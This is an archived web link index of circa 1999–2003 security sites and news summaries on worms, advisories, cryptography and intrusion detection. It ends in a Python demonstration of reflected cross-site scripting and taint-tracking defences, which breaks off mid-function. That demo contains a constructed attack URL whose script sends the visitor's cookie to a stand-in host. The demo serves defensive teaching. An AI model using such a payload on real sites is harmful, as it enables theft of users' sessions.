PLEASE note: These pages are here solely for historic purposes. New articles have not been written since 2001; many links in the index are broken; and most ahref.com email addresses will now bounce. Try visiting ep Productions, Incorporated, the web programming and development company behind this site.


Web Index

SECURITY

SITES

2600 The Hacker Quarterly
The online version of 2600, a "hacker quarterly" that provides information on hacking (or cracking) into computer and telecommunications systems.

Apache Week: Using User Authentication
Information on using the htpasswd program and .htaccess files to provide basic user authentication for Apache web servers.

Bugtraq mailing list archives
Archives for Bugtraq, a mailing list for detailed discussion of Unix security holes: what they are, how to exploit them, and how to fix them.

CERT
The Computer Emergency Response Team (CERT) was created in 1988 by the Department of Defense. Their site has the latest security alerts as well as tips for internet systems security.

GnuPG - The Gnu Privacy Guard
"A complete and free replacement for PGP." Open-source encryption software, free of patents, and similar to PGP.

Hacker News Network
Daily news concerning computer and network security, hacking, and cracking.

Hideaway.Net - Security, Privacy, Anti-Virus, Linux
Texts and links concerning security, privacy, and associated topics.

ICSA Information Security Magazine
A monthly magazine dealing with computer and network security.

Lincoln Stein Locks Down Web Security
Outlines steps for securing your web site and preventing a break-in. Includes a FAQ and other resources. From Web Review.

Microsoft Security Advisor Program
Security headlines and software patches from Microsoft, for Microsoft products.

NTBugtraq
Editorials, FAQs, and news regarding security exploits and security bugs in Windows NT and related programs. Includes archives of the NTBugtraq mailing list.

The Open Web Application Security Project
"The project is developing software tools and knowledge based documentation that helps people secure web applications and web services. Much of the work is driven by discussions on the Web Application Security list at SecurityFocus.com."

Paj's Home: Cryptography
Information on the math behind RSA cryptography, the Vigenère cipher, and cryptography in general.

PGP Home
Home page for PGP Security, owners and developers of Pretty Good Privacy (PGP) software.

Rootshell
Internet security news - reports on exploits of various machines, and papers describing security issues.

securityfocus
Lists of security compromises for various software packages, and news from the computer security world.

Thawte Knowledge Base
Information on computer security and cryptography, provided by Thawte, a digital certificate provider.

VeriSign Repository
Information on digital certificates and security, focusing on VeriSign's products.

W3C Security FAQ
A detailed and authoritative FAQ about web site security. Alerts help spread the word about security holes.

The WWW Security FAQ
Frequently asked questions about website security and CGI security, written by Lincoln Stein and hosted by the W3C.

ARTICLES

Guarding Against Terror
Some general guidelines on helping to secure your company against electronic attack - and thoughts on the importance of doing so. (1/10/2002 at Web Techniques)

'NewLove' Bug Nastier Than 'ILOVEYOU'
A new email virus dubbed "NewLove" acts much like the ILOVEYOU virus except that it changes its name as it travels, and targets files essential for running Windows computers. (5/19/2000 at ZDNet)

.Net Demystified: What You Must Know About MS's Software Scheme
With .Net, Microsoft wants to connect all your information with a bunch of connected services; but how will they keep your information secure? (3/19/2001 at ZDNet Developer)

Abnormal IP Packets
An explanation of abnormal Internet Protocol packets, relevant to intrusion detection administrators. (10/13/2000 at SecurityFocus)

Ain't No Network Strong Enough
In his new book, "Secrets and Lies," cryptography expert Bruce Schneier says that no computer network is truly secure; the best we can hope for is good recoveries from catastrophes. (8/31/2000 at Salon.com)

Allchin: Disclosure May Endanger U.S.
Jim Allchin of Microsoft, at the antitrust trial, claimed that disclosing MS source code could damage national security. "He later acknowledged that some Microsoft code was so flawed it could not be safely disclosed." (5/21/2002 at eWeek)

Answers About Bastille Linux From Jon & Jay
A Slashdot interview with Jon Lasser and Jay Beale, the creators of the Bastille Hardening System, a system that attempts to "harden" Linux (against cracker attacks). (11/15/2000 at Slashdot.org)

Anti-Attack Feds Push Carnivore
Within hours of the plane crashes into the World Trade Center and Pentagon, the FBI had visited numerous ISPs, asking to add Carnivore machines to their networks to monitor traffic. (9/12/2001 at Wired News)

Antivirus Firms: FBI Loophole Is Out of Line
Anti-virus software companies including Symantec and Network Associates say they won't modify their programs to allow the FBI's "Magic Lantern" software to infect users' computers, and that they haven't been asked by the government to do so. (12/11/2001 at ZDNet)

Arrest Of Computer Researcher Is Arrest Of First Amendment Rights
Bruce Schneier on the injustice of arresting Dmitry Sklyarov for providing information and tools to break e-book encryption. (8/6/2001 at Internet Week)

Asymmetric Cryptography in Perl
An introduction to asymmetric encryption and Perl modules that help you work with it: Crypt::RSA, Crypt::DH, and Crypt::DSA. (9/26/2001 at Perl.com)

At Last! New Security Measures From MS
Microsoft has announced a two-part plan, the Strategic Technology Protection Program (STPP), to help users deal with security issues: part 1, Get Secure, helps users secure their systems; part 2, Stay Secure, is a commitment to ship more-secure software. (10/9/2001 at ZDNet)

Attack On Internet Called Largest Ever
A "distributed denial of service" (DDOS) attack on the Internet's 13 root servers caused 8 or 9 of them to go down for about an hour on October 21st; most Internet users didn't appear to notice any problems. (10/22/2002 at The Washington Post)

Authenticate and Track Users with PHP
How to use PHP to control user authentication, set and read cookies, and handle user sessions. (2/2/2000 at WebMonkey)

Big Hole in E-Mail Transfer App
Internet Security Systems (ISS) and Sendmail, Inc. announced that a security problem affecting all versions of sendmail after 5.79 has been discovered. (3/3/2003 at Wired News)

Black Hat: Users Warned About Wireless LAN Holes
Experts at the Black Hat conference in Las Vegas recommended that corporations using wireless networks use extra authentication systems to keep hackers from compromising a basic security hole in the Wired Equivalent Privacy (WEP). (7/12/2001 at Computer World)

Blueprint to Fight Cybercrime
At a meeting of the Group of Eight nations in Paris, the French Interior Minister called for more international coordination in cracking down on cybercrime, but argued against an international cyberpolice force. (5/15/2000 at Wired News)

A Brief History of The Worm
A history of self-replicating malware, from before Robert Morris' 1988 worm through today's Windows-based worms. (1/26/2001 at SecurityFocus)

Business: IM Is Getting Out of Control
Because of the lack of security and increasing popularity of instant messaging, a number of companies are working on secure IM applications for business use. (4/26/2001 at ZDNet)

Can We Provide Security for the Internet and Protect Free Speech at the Same Time?
Columnist Tom Regan backs off from his condemnation of online protestors, and recognizes the use of cyber-protest tools (including overloading "enemy" servers) as legitimate protest. (1/4/2000 at The Christian Science Monitor)

Catch Hackers in the Act
How to use intrusion detection systems (IDSes) to watch for malicious web activity from a remote browser, and be warned in real time of attempted web-based attacks. (12/13/2000 at builder.com)

CERT Coordination Center FTP Server Retired
Public-interest security group CERT/CC has retired its FTP server, and from now on will be serving publications from its website and through email only. (9/29/2000 at CERT Coordination Center)

CERT Statistics Tell Tale of Increasing Security Woes
Based on the first quarter of 2001, the number of incident reports and vulnerability reports which CERT/CC puts out this year will most likely top previous years. (4/27/2001 at InfoWorld)

CERT Summary CS-99-04
CERT Coordination Center's quarterly listing of online attacks notable either for the frequency with which the attack has been reported, or the nature of the attack. (11/23/1999 at CERT Coordination Center)

CERT to Disclose Software Flaws
The CERT Coordination Center, which tracks computer security issues and advises the public on protecting themselves, will reveal security problems to the public within 45 days of their discovery, whether fixes for the problem are available or not. (10/7/2000 at ZDNet)

CERT® Advisory CA-2001-37: Buffer Overflow in UPnP Service On Microsoft Windows
A security warning from CERT regarding vulnerabilities in several modern versions of Microsoft Windows. (12/20/2001 at CERT Coordination Center)

CERT® Advisory CA-2002-03: Simple Network Management Protocol (SNMP)
"Numerous vulnerabilities have been reported in multiple vendors' SNMP implementations. These vulnerabilities may allow unauthorized privileged access, denial-of-service attacks, or cause unstable behavior." (2/12/2002 at CERT Coordination Center)

CERT® Summary CS-2002-01
A summary of recent trends in computer security problems, provided by CERT: concerning SNMP, Solaris CDE, buffer overflows in Windows UPnP, ssh daemon problems, wu-ftpd, and more. (2/28/2002 at CERT Coordination Center)

Clinton Declares War on Cyberterrorists
President Clinton has asked Congress for funds to train college students to be computer security experts, in what is being described as an ROTC-like program. (1/7/2000 at ZDNet)

CNET Reviews 4 Internet Security Packages
Reviews of 4 personal firewall programs, geared towards home users on Windows machines. (8/1/2000 at CNET.com)

The Code Red Alert Continues
Technical information on how the Code Red worms work and what they do to your server; and how to stop them. (9/13/2001 at builder.com)

Code Red II: A Double Whammy
Code Red II, a worm which installs a back door in unpatched Windows machines running IIS, is infecting hundreds of thousands of machines. (8/6/2001 at ZDNet)

Computer Security Vulnerabilities Double In '01- CERT
According to CERT, the number of security incidents and the number of computer vulnerabilities both doubled from 2000 to 2001. (1/11/2002 at NewsBytes)

Configuring Linux and Squid as a Web Proxy
How to install and configure Linux and Squid on a machine to act as a web proxy. (5/30/2001 at SecurityFocus)

Congressional Audit Takes IRS to Task
A General Accounting Office (GAO) audit indicates that in 2000, the Internal Revenue Service (IRS) left their computers, and taxpayers' returns and personal information, unguarded against hackers. (3/16/2001 at ZDNet)

Construct Secure Networked Applications With Certificates, Part 1
How public-key cryptography works, and how certificates help. (1/12/2001 at Java World)

Construct Secure Networked Applications With Certificates, Part 2
X.509 certificates, and the Java classes that support their use. (2/16/2001 at Java World)

Construct Secure Networked Applications With Certificates, Part 3
Using certificate revocation lists (CRL) to terminate certificates which have been compromised. (3/16/2001 at Java World)

Construct Secure Networked Applications With Certificates, Part 4
Using Java classes to deal with public-key cryptography, X.509 certificates, and certificate revocation lists. (4/13/2001 at Java World)

Control Your Identity or Microsoft and Intel Will
Jon Udell shows how we could use existing technology to achieve many of the same goals that Microsoft wants to solve with Palladium; but argues that the ordinary consumer isn't motivated to do so. (7/8/2002 at O'Reilly Network)

Controlling Encryption Will Not Stop Terrorists
Security experts say that installing back-doors in encryption technology won't stop terrorists; they are more likely to use steganography to hide their communications, or plain old codewords. (9/18/2001 at New Scientist)

Cracker Launches Attack on NASA
A cracker claiming to be a 17-year-old high school student has defaced web pages at three government agencies, saying he wants to convince the government to take security seriously. (11/23/1999 at Wired News)

Cracks Happen; Protect Thyself
Speakers and attendees at the RSA Conference in San Francisco, acknowledging that determined hackers can break almost any system, discussed getting end-users to stop using pirated software and running unsafe applications. (4/11/2001 at Wired News)

Critics Blast MS Security
Under certain circumstances, Windows 2000 will use weak security but tell its users that it is using strong security. (5/16/2000 at Wired News)

Cross-Site-TRACE
Talk about the XST - cross-site-trace - security hole in HTTP, which allows unauthorized scripts to be passed to webservers for execution. (1/24/2003 at Slashdot.org)

The Crux of NT Security - Phase One: The Approach
The key to NT network security is layered security. Assume your outer systems will be compromised; but stop all attacks at the periphery. (11/11/2000 at SecurityFocus)

Cyber-Crime Center Opens
The U.S. Customs CyberSmuggling Center opened in Fairfax County, Virginia, this week; the CyberSmuggling unit of U.S. Customs has been operating without a permanent home for 3 years. (10/5/2000 at The Washington Post)

Cyberwarfare: The Business Opportunity
The U.S. is putting together a center to both combat and practice online espionage, overseen by a U.S. Air Force general. (10/8/1999 at The Industry Standard)

Data Bunkers Protect Off-Site Sites
Web hosting companies are spending a lot of money, and a lot of effort, in making their data centers secure enough for the banks, ISPs, and governments that have sites hosted there. (11/9/1999 at The Washington Post)

Deciphering Encryption Law
An explanation of the Bureau of Export Administration's (BXA's) new (1/12/2000) regulations regarding encryption exports. (1/25/2000 at Upside)

Defenses Still Weak Against DDoS Attacks
Long after the Distributed Denial of Service attacks of 2000, Internet sites still aren't fully protected against a repeat. (1/19/2001 at ZDNet)

Detecting Local Filesystem Changes with Perl
Using Perl to figure out what an intruder might have changed on your Unix system. (8/30/2000 at O'Reilly and Associates)

Digital Detectives Track Hacks
As the number of security breaches online rises, security experts find themselves more in demand. (4/22/2001 at ZDNet Developer)

A Distant Sense of Security
HavenCo Ltd. (based on an open-sea platform in Sealand) and Mount10 International AG (based inside a mountain in the Swiss Alps) offer customers the ultimate in data security and anonymity. (9/20/2000 at The Washington Post)

Diverting Disaster: Preventing DoS Attacks
General guidelines on making your programming code resistant to security exploits. (4/21/2000 at Web Review)

DNS Security Update #1
ICANN's report on the security of the DNS system - the root servers, the underlying technology, etc. (1/4/2002 at ICANN)

Do Security Holes Demand Full Disclosure?
Marcus Ranum's keynote at DEF CON 8.0 this year brings up the question: is full disclosure of security vulnerabilities a good or bad thing? (8/16/2000 at ZDNet)

DOD Weighs Javascript Ban
The Department of Defense is considering banishing client-side scripting languages like Javascript and Active X from their web pages, to keep mobile code from launching attacks from DOD workers' browsers. (11/22/1999 at ZDNet)

Does IIS Have a Future?
Columnist Tim Mullen says that switching your webserver from IIS to an alternative (like Apache) because you can't secure IIS is a bad idea; if you can't secure IIS, you won't be able to secure other web servers, either. (10/7/2001 at SecurityFocus)

dsniff and SSH
A defense of SSH and SSL, in response to suggestions they are woefully insecure protocols. (12/22/2000 at O'Reilly and Associates)

Easy Eavesdropping on Wireless Networks
A paper published by researchers at UC Berkeley and Zero-Knowledge Systems points out the inherent flaws of the Wireless Ethernet Compatibility Alliance's (WECA) encryption system, Wired Equivalent Privacy (WEP). (2/27/2001 at Business Week)

Encryption Tutorial
A several-part tutorial on encryption, covering asymmetric and symmetric key-based algorithms, hashing, PGP, crypt, and mcrypt. (5/11/2000 at WebMonkey)

The End of SSL and SSH?
With the release of dsniff 2.3 - a sniffing tool that allows an attacker to intercept SSL and SSH connections - the computer world needs better security. (12/18/2000 at SecurityPortal)

Experts Applaud Microsoft's Security Moves
Microsoft says it is making fundamental changes to Outlook - having it refuse to open program attachments and limit access to address books - to hinder future email viruses. (5/16/2000 at InternetNews.com)

Experts: Asia Not Taking Net Security Seriously
According to IDC Asia-Pacific, Asian businesses do not take cybersecurity seriously; they view Web defacements as minor embarrassments. (3/16/2001 at Excite News)

Experts: E*TRADE Still Not Safe
E*TRADE is once again plagued by security problems with its service. (9/26/2000 at InternetNews.com)

File-Sharing Programs Carry Trojan Horse
Grokster and Limewire, two popular file-sharing programs, apparently come bundled with "spyware" provided by third-party advertisers. (1/2/2002 at News.com)

FTP Buffer Overflows
Unix and open-source security advisories: buffer overflows in several FTP daemons, Oracle Application Server, and more; temporary file race conditions in pine and pico; mkpasswd; and more. (4/17/2001 at O'Reilly Network)

Gates Vows to Plug Holes
Embracing a philosophy he calls "Trustworthy Computing," Bill Gates says he wants Microsoft's workers to focus on security and privacy in their products, and see them as more important than new features. (1/17/2002 at Wired News)

Gobbles Releases Apache Exploit
Gobbles Security has released a tool that exploits the recently-divulged chunked encoding vulnerability in Apache; the program, Apache-scalp.c, works against OpenBSD boxes running unpatched Apache versions. (6/20/2002 at SecurityFocus)

H2K2 Hackers Say They Want a Revolution
Aaron McGruder, author of the comic strip Boondocks, got a standing ovation at the H2K2 hacker conference; while attendees debated the ethics of former hackers working for security companies and the government. (7/15/2002 at SecurityFocus)

Hack Attack? Relax, You're Covered
Lloyd's of London is offering discounted insurance against money lost to hacker and cracker attacks through a partnership with Counterpane, a computer security firm. (7/10/2000 at The Industry Standard)

HacK, CouNterHaCk
A profile of L0pht, a "gray-hat" hacker/cracker group that spends its time finding vulnerabilities in software and publishing them for both "black hat" crackers and software developers' perusal. (10/3/1999 at The New York Times)

Hack-umentary, the E-Film
In a well-received 11-minute short film released on the Web, a recent graduate of the Rhode Island School of Design interviewed members of Cult of the Dead Cow, the hackers who released the Back Orifice program. (2/14/2000 at Wired News)

Hacker Re-writes Yahoo! News Stories
Freelance security consultant Adrian Lamo demonstrated that using an ordinary Web browser and Yahoo's proxy servers, he could subtly alter the content of the portal's news stories, spreading disinformation to readers. (9/20/2001 at New Scientist)

Hacker Startup Joins E-security Market
L0pht Heavy Industries, a well-known security "think tank," is merging with AtStake to form a computer security firm; they already have $10 million in funding. (1/6/2000 at ZDNet)

Hackers Caught in Security 'Honeypot'
Lance Spitzner, a security consultant with Sun Microsystems, uses a "honeypot" - an Internet-connected server of no strategic importance to his company - to observe hackers trying to break in to corporate systems. (12/19/2000 at ZDNet)

Hackers Forming Zombie Army
The CERT Coordination Center warns that crackers are compromising computers across the Internet in preparation for massive denial of service attacks using Tribal Flood; most of the affected systems run Red Hat Linux. (9/18/2000 at ZDNet)

Hackers in Suits? Gadzooks!
DefCon, "the annual computer underground party for hackers," is becoming more corporate: security guards check for badges, underage drinking is now discouraged, and there are daily press conferences; some attendees are protesting the changes. (7/14/2001 at Wired News)

Hackers' Tricks to Avoid Detection
Some simple ways in which hackers can conceal their attempts to compromise your web applications, and conceal where they're attacking from. (11/1/2000 at CNET.com)

Handhelds: Here Come the Bugs?
Security firms such as F-Secure and Network Associates are releasing programs to defend handheld devices from viruses and Trojan horses; some say they're overhyping a nonexistent danger. (3/19/2001 at ZDNet)

Hard Time for E-Commerce Saint?
Raphael Gray, a teenager who hacked into numerous e-commerce sites, grabbed thousands of credit card numbers, and posted them publicly in a campaign to expose the dangers of online commerce, has pled guilty to cracking into customer databases. (4/22/2001 at Wired News)

Hidden in Plain Sight
Using Java's Filter classes to implement steganography - hiding information in pictures. (7/13/2001 at Web Techniques)

Homeland Insecurity
A long look at Bruce Schneier's thoughts on security, and how they have evolved from emphasizing encryption to compartmentalizing dangers and keeping well-trained people in the security loop. (9/10/2002 at The Atlantic Monthly)

Hotmail Virus Threat
Cross-site scripting problems mean that free webmail services like Hotmail and Yahoo Mail could easily spread email viruses far and wide. (6/1/2001 at SecurityFocus)

How Code Red Revealed the Perils of Port 80
As more embedded devices are given IP addresses and mini-webservers, poorly written software may result in devices being controlled or disabled by malicious hackers using viruses like Code Red or plain old web browsers. (10/1/2001 at ZDNet)

How Much Hack Info Is Too Much?
Security experts are divided over whether it was appropriate to post a recent message to BugTraq showing how to reformat the hard drives of Internet Explorer users, using code on a web page. (11/19/2002 at Wired News)

How to Crack Open an E-Book
A hacker has figured out how to break the encryption on RocketBook e-books; the information is now circulating via web and email. (4/27/2001 at Wired News)

How Web Servers Help Attackers
How interactive outbound connections, allowed by weak network security, can compromise your web server. (9/6/2000 at builder.com)

The Hunt for the Worm Writers
The FBI's National Infrastructure Protection Center (NIPC) is working hard to determine who wrote the SirCam and Code Red worms, but has had no luck so far. (8/9/2001 at Wired News)

ICANN Tables Current Agenda
ICANN has decided, for the near future, to concentrate on the stability of the Internet, rather than on domain name policy. (9/27/2001 at InternetNews.com)

ICQ Logs Spark Corporate Nightmare
eFront, an online advertising affiliation company, is suffering because hackers have posted the instant messaging archives of its CEO, Sam Jain, to numerous websites; Jain had ICQ set to log his messages. (3/15/2001 at News.com)

IDS False Positive and False Negative Reduction Strategies and Techniques, Part Two
A few ways to reduce false alarms in intrusion detection systems. (9/27/2001 at SecurityFocus)

ILOVEDRAMA: Love Bug Hunt Continues
Links to coverage of the hunt for the creator(s) of the ILOVEYOU virus/worm. (5/9/2000 at The Industry Standard)

Infectable Objects, Part Five - HTML and Other Scripts
How web-based scripts can be infected with malicious code. (4/18/2001 at SecurityFocus)

Interbase Backdoor, Secret for Six Years, Revealed in Source
Slashdot discussion of a back-door account in the recently-open-sourced Interbase database, and the merits of open source vs. closed source in terms of security. (1/11/2001 at Slashdot.org)

Interior Dept. Sites Still Down
U.S. District Judge Royce Lamberth has ordered the U.S. Department of the Interior's Internet access shut down, because lax security allows hackers to infiltrate department systems and alter Indian Trust financial records at will. (12/10/2001 at Wired News)

Internet Giants Confer on Denial-of-Service Attacks
The Bay Area DDoS Working Group (a national group) is working on stopping distributed denial-of-service attacks like the ones that took down major sites in February, 2000. (9/26/2000 at News.com)

Internet Security Alliance Debuts
The Internet Security Alliance (www.isalliance.org), an industry group dedicated to sharing security information and working against malicious hackers, was launched on April 19, 2001. (4/19/2001 at Excite News)

Internet Too Complex to Secure, Says Exec
Bruce Schneier, CTO of Counterpane Internet Security, plans to tell Congress that the Internet can't be kept secure; we just have to deal better with security problems and lapses. (7/13/2001 at Network World Fusion)

Introduction to Autorooters: Crackers Working Smarter, not Harder
Autorooters - software that automatically scans a machine or network for multiple security vulnerabilities and invades vulnerable machines - explained. (8/21/2002 at SecurityFocus)

An Introduction to Intrusion Detection Systems
An overview of IDSes - host-based and network-based - and how they work: anomaly detection, signature detection, target monitoring, and stealth probes. (12/6/2001 at SecurityFocus)

An Introduction to OpenSSL, Part One: Cryptographic Functions
A look at OpenSSL, a library implementing Secure Sockets Layer (SSL) protocol routines; covers basic cryptographic concepts. (8/22/2001 at SecurityFocus)

An Introduction to OpenSSL, Part Two: Cryptographic Functions Continued
How to get, compile, and install OpenSSL, and how to use some basic cryptographic commands. (9/5/2001 at SecurityFocus)

Introduction to PAM
How to use Pluggable Authentication Modules (PAM) to interface your programs with any type of authentication system available on your Linux box. (9/27/2001 at O'Reilly Network)

Introduction to Security Policies, Part Three: Structuring Security Policies
How to write a good security policy. (10/9/2001 at SecurityFocus)

Introduction to Security Policies, Part Two: Creating a Supportive Environment
Getting management buy-in for your security policies. (9/24/2001 at SecurityFocus)

An Introduction to XML Digital Signatures
A look at XML Signature, a means of ensuring the integrity and authenticity of business documents transferred over the Internet. (8/8/2001 at XML.com)

Intrusion Detection Systems: An Opening For Hackers?
The National Infrastructure Protection Center (NIPC) says that intrusion detection systems on computer systems can potentially be overwhelmed by stress-testing tools, leaving hackers free to attack undetected. (3/15/2001 at NewsBytes)

IRC: Attack From Killer 'HaX0rZ'
Internet Relay Chat (IRC) is dying a slow death at the hands of hackers launching DOS attacks against IRC servers. ISPs that rushed to stop attacks against major commercial sites last year aren't working quite as hard to save the free chat service. (1/9/2001 at Wired News)

Is Anyone Accountable for Net Security Snafus?
Software companies try to deflect blame for security problems in their software by having users sign away their right to sue for any problems which occur. Instead, they should be improving their products. (8/31/2000 at ECommerce Times)

Is Scanning the Answer to Web Attacks?
In the wake of the Denial of Service attacks against major websites, many system administrators are reluctant to use FBI-supplied intruder detection tools, for which the FBI is not releasing source code. Open-source alternatives exist. (2/10/2000 at InternetNews.com)

Java JDE Allows Unauthorized Commands
Recent Unix and open-source security advisories: Java problems, Solaris LDAP authentication, XFree86, sudo, Zope, and more. (2/27/2001 at O'Reilly Network)

JSP = Java Source Peeking?
Implementation problems with various Java application server platforms allow remote users to view Java source code which should be hidden; some tips on securing your code are given here. (10/4/2000 at builder.com)

Kevin Mitnick Bares All
At Giga Research's Infrastructures for E-Business conference, Kevin Mitnick spoke for the first time since leaving jail, giving managers advice on security. (9/28/2000 at The Industry Standard)

Killer Worm Found "In the Wild" on Internet
A new Windows-based Internet worm that can update itself automatically (once it infects a computer, it checks in to a remote website) is replicating on the Net. (10/31/2000 at InternetNews.com)

Klez Won't Stop Making Net Rounds
The Klez virus and its variants, which debuted in April 2002, are still being spread by email users running MS Outlook on Windows PCs without sufficient anti-virus protection. (3/4/2003 at Wired News)

Leads Aid in Narrowing List of Suspects in Web Attacks
Investigators have determined that the attacks against major websites last week utilized compromised computers from several California universities, and have identified a small group of suspects. (2/14/2000 at MSNBC)

Linux Worm Hits the Network
The Linux.Slapper.Worm, apparently built to aid in launching distributed denial of service attacks, spreads by compromising Linux servers with vulnerable versions of OpenSSL. (9/16/2002 at Wired News)

List: Windows, Unix Still at Risk
The FBI and SANS released an updated list of the top 20 Internet security vulnerabilities, and advice on fixing them. (10/3/2002 at Wired News)

Major New Worm Poses Serious Threat
A new worm that infects Windows systems, the Nimda virus, can be passed on via email, web browsing, or file sharing; after infection, it inspects other target machines for 10 to 100 known Windows vulnerabilities in an attempt to spread. (9/18/2001 at InfoWorld)

Major Online Credit Card Theft Exposed
In January, 1999, a cracker stole information on over 485,000 credit card accounts from a website and stored the info on a U.S. government computer; it wasn't until December 1999 that Visa notified member institutions. Some of the accounts are still open. (3/17/2000 at ZDNet)

Malicious HTML Tags Embedded in Client Web Requests
CERT's advisory regarding "cross-site" scripting - which can allow malicious users to run arbitrary code on web servers that take in, then display, user input. (2/2/2000 at CERT Coordination Center)

Market Realities Hit Security Nonprofit
The CERT Coordination Center at Carnegie Mellon University receives $3.5 million annually from the U.S. government to gather and distribute security information to the public; it will soon start charging for premium services, like early warnings. (4/20/2001 at The Industry Standard)

Microsoft's Outlook: Cloudy Security
IT managers are beginning to express discontent with Microsoft for building software that is especially susceptible to email viruses such as ILOVEYOU and Melissa. (5/15/2000 at ZDNet)

Most Say Computer Hacking Should Be a Felony
A majority of U.S. adults say that computer hacking which disrupts a company's Internet services should be punishable as a felony. (8/28/2000 at Yahoo News)

MS SQL Server Worm Wreaking Havoc
Discussion of the worm attacking Microsoft SQL Server (later named SQL Slammer) which slowed down Internet performance starting early morning, January 25th, 2003. (1/25/2003 at Slashdot.org)

Multiple Vulnerabilities in BIND
CERT reports that numerous vulnerabilities of varying severity have been found in BIND (a popular domain name server). (11/10/1999 at CERT Coordination Center)

The Net Scare
Denial-of-service (DoS) attacks such as the ones that recently took down Yahoo, Amazon, and other major sites are nothing new; they don't really threaten the average Net user, but they are an incentive for technologists to improve the Net's security. (2/10/2000 at Salon.com)

Net Vigilance
A debate - which is more secure: open-source software, or proprietary? (7/16/2001 at ZDNet Developer)

New Internic Email Security Hole
Details on the security problems Network Solutions, Inc., created with their free email system. (9/24/1999 at 2600 - The Hacker Quarterly)

New Web Attack Tools Exploit Chat Technology
Security experts have discovered Trinity v3, a new distributed denial of service (DDoS) tool that uses Internet Relay Chat (IRC). (9/5/2000 at News.com)

Nimda Spreads--Worse Than Code Red?
The Nimda virus is victimizing Windows machines across the world, and is expected to spread further and faster than Code Red; experts say there's no evidence to link it to the recent terrorist attacks in the U.S. (9/19/2001 at ZDNet)

Nimda: Another Worm, More Patches
The Gartner Group recommends that corporations that have been hit by the "Code Red" and Nimda viruses immediately "investigate alternatives" such as servers from iPlanet and Apache. (9/21/2001 at ZDNet)

No More I Love You Viruses
The UK's Defence Evaluation and Research Agency (DERA) plans to release software, ::Mail, which acts as a plugin on users' email programs; it forces the user to authorize all outgoing email, which theoretically would stop email viruses from spreading. (4/24/2001 at The Register)

Not What It's Cracked Up to Be
A theory on the hacking of Microsoft's corporate network: it was an inside job. (11/2/2000 at PBS)

NSA Takes the Open Source Route
The National Security Agency (NSA) is paying NAI labs, a division of PGP Security, $1.2 million over two years to help develop SELinux, a more secure kernel for Linux. (4/11/2001 at Wired News)

Open RSA: The Patent Expires
What the release of the RSA encryption algorithm into the public domain means for the future, and how the algorithm was first created. (9/8/2000 at O'Reilly Network)

OpenBSD Plugs a Rare Security Leak
A security bug in OpenBSD 2.7 was exploited earlier this week; the proactive developers of the "secure by default" operating system had fixed the bug months ago, but not distributed the fix yet. (10/6/2000 at Upside)

OpenSSH Problems
Recent security problems related to Linux: OpenSSH and sftp vulnerabilities, hylafax, Apache on MacOS X, and more. (10/1/2001 at O'Reilly Network)

An Overview of LIDS
A look at how LIDS (the Linux Intrusion Detection System, which removes some of root's privileges to improve system security) works, and how to install and configure it. (10/17/2001 at SecurityFocus)

Palladium Holds Promise, and Peril
Microsoft's Palladium could enhance security and protect consumers from viruses and spam; but it could also lock consumers in to hardware and software manufacturers, by holding their information hostage. (7/8/2002 at SecurityFocus)

Password-Protecting Your Web Pages
Using passwords to keep people out of private web pages, with a focus on Microsoft FrontPage and IIS. (4/21/2000 at 15 Seconds)

Passwords Don't Protect Palm Data, Security Firm Warns
Security firm @Stake has demonstrated that the Palm OS is insecure, and that anyone with physical access to a Palm or Visor can break through password protection to get access to the data on it. (3/2/2001 at News.com)

Passwords Soon To Be Passe
Some biometric devices - devices that identify users by appearance, fingerprint, voice, or other biological characteristic - are already available for sale. (2/7/2000 at The Record Online)

Paul Vixie and David Conrad on BINDv9 and Internet Security
Paul Vixie and David Conrad of the Internet Software Consortium talk about BINDv9, a complete rewrite of the DNS software, Linux, and BSD. (10/3/2000 at Linux Security)

PBF (Pretty Big Flaw) in PGP
A PGP plugin for Microsoft Outlook contains a vulnerability that would let attackers take over a user's computer with a specially-crafted email message. (7/11/2002 at Wired News)

PDF Files May Carry Peachy Virus
A virus that can spread through Adobe's Acrobat software, but not Acrobat Reader, has been developed, raising fears that Reader users may become susceptible to PDF viruses. (8/8/2001 at ZDNet)

Phone Phreaks to Rise Again?
Views are mixed on whether IP-based telephones will cause a resurgence in phreaking - the telephone system equivalent of hacking. (5/16/2000 at Wired News)

Playing With Fire: Not So Sweet Honeypots
What a honeypot is (a system designed to lure "black hat" hackers for observation), why you might want to set one up, and general rules for setting up such a machine. (1/12/2001 at internet.com)

Port Scans Legal, Judge Says
A judge in a federal court has ruled that port scanning a computer network does not damage it; thus, corporations can't sue for "damages" caused by a port scan. (12/18/2000 at SecurityFocus)

Preventing Cross-site Scripting Attacks
Using Perl's taint checking, via the Apache::TaintRequest module, to make sure user-supplied data is HTML-escaped before it is echoed back into a page, preventing cross-site scripting attacks on your users. (2/20/2002 at Perl.com)
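
The CERT advisory above describes the bug (input echoed back unescaped) and the Perl.com article describes one cure (taint tracking, so unescaped request data cannot reach the output). The following is an added example, not code from either article and not Apache::TaintRequest itself: it reproduces the idea in plain Python with a Tainted string type, a vulnerable renderer, a checked renderer that refuses tainted values, and HTML escaping at the output boundary. The URL, the page template and the injected script are constructed for the example.

```python
"""Reflected XSS: the echo-back bug and two fixes (output escaping, taint tracking).

Added example, not code from the CERT advisory or the Perl.com article. It
mimics the idea behind Perl taint mode / Apache::TaintRequest in plain Python:
anything that came from the request is wrapped in a Tainted string and the
output layer refuses to emit it unless it has been escaped.
"""
import html
from urllib.parse import parse_qs, urlsplit


class Tainted(str):
    """A string that originated in the HTTP request (assumption: every query
    value is untrusted)."""


def escape(value: str) -> str:
    """HTML-body escaping; the result is a plain str, i.e. no longer tainted."""
    return str(html.escape(value, quote=True))


def params_from_url(url: str) -> dict:
    """Parse the query string and mark every value as tainted."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return {k: Tainted(v[0]) for k, v in qs.items()}


def render_vulnerable(template: str, **vars) -> str:
    """What the advisory describes: user input interpolated straight into HTML."""
    return template.format(**{k: str(v) for k, v in vars.items()})


def render_checked(template: str, **vars) -> str:
    """Refuse to emit tainted data; escaped values are untainted and pass."""
    for name, value in vars.items():
        if isinstance(value, Tainted):
            raise ValueError(f"tainted value {name!r} reached HTML output unescaped")
    return template.format(**vars)


TEMPLATE = "<html><body><p>Results for: {query}</p></body></html>"

# Constructed request: a search link whose query carries a script tag that
# ships the victim's cookie to a third-party host.
ATTACK_URL = ("http://example.test/search?query=%3Cscript%3Edocument.location"
              "%3D%27http://evil.test/%3F%27%2Bdocument.cookie%3C/script%3E")


def demo():
    params = params_from_url(ATTACK_URL)
    query = params["query"]

    # 1. Vulnerable: the script tag is reflected into the page and would run in
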